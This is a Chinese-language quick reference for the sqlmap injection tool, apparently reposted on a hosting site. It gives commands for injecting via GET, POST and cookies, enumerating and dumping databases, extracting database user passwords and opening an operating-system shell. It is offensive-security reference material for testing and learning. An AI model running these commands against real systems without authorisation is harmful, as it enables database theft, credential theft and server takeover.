SQLMAP
GET 方式的注入 sqlmap.py -u "URL"
POST 方式的注入 sqlmap.py -u "URL" --data "POST参数=POST数值"
COOKIE 方式的注入 sqlmap.py -u "URL" --cookie "cookies 值"
爆数据库名(cookie根据实际的情况) sqlmap.py -u "URL" [--cookie "cookies 值"] --dbs
爆目标数据库中的表 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --tables
爆目标数据表字段 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 --columns
导出目标字段的数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 -T 表名 -C 要导出数据的字段名,多个字段用逗号分隔 --dump
爆出目标库有多少数据 sqlmap.py -u "URL" [--cookie "cookies 值"] -D 数据库名 --count
检测当前用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-user
检测当前用户是否管理员 sqlmap.py -u "URL" [--cookie "cookies 值"] --is-dba
检测数据库用户 sqlmap.py -u "URL" [--cookie "cookies 值"] --user -v 0
检测数据库用户密码 sqlmap.py -u "URL" [--cookie "cookies 值"] --password -v 0
检测当前数据库 sqlmap.py -u "URL" [--cookie "cookies 值"] --current-db
多线程 -threading 5
如果是管理员,我们可以写Shell
操作系统Shell写入
sqlmap.py -u "URL" [--cookie "cookies 值"] --os-shell
免责声明:本站发布的内容(图片、视频和文字)以原创、转载和分享为主,文章观点不代表本网站立场,如果涉及侵权请联系站长邮箱:is@yisu.com进行举报,并提供相关证据,一经查实,将立刻删除涉嫌侵权内容。